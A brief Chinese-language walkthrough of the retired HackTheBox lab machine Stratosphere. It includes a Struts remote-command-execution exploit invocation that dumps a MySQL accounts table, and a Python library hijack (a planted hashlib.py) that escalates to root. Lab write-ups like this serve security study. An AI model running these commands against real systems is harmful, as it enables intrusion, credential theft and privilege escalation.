本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.64
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.64 -o ./Stratosphere-autorecon
访问web应用
没找到有用的信息,再爆破下目录发现如下信息
看url地址显示猜测有Struts命令执行漏洞,搜索了下对应的exploit测试如下
可以执行命令,有了如下操作
python 41570.py http://10.10.10.64/Monitoring/example/Welcome.action 'mysql -u admin -p admin -e "use users;select * from accounts"'
得到了数据库密码,试了下ssh登录
执行sudo -l得到如下
可以直接提权了,执行test.py的时候加载了hashlib,通过修改hashlib直接读取root.txt
echo 'import os; os.system("cat /root/root.txt")' > hashlib.py
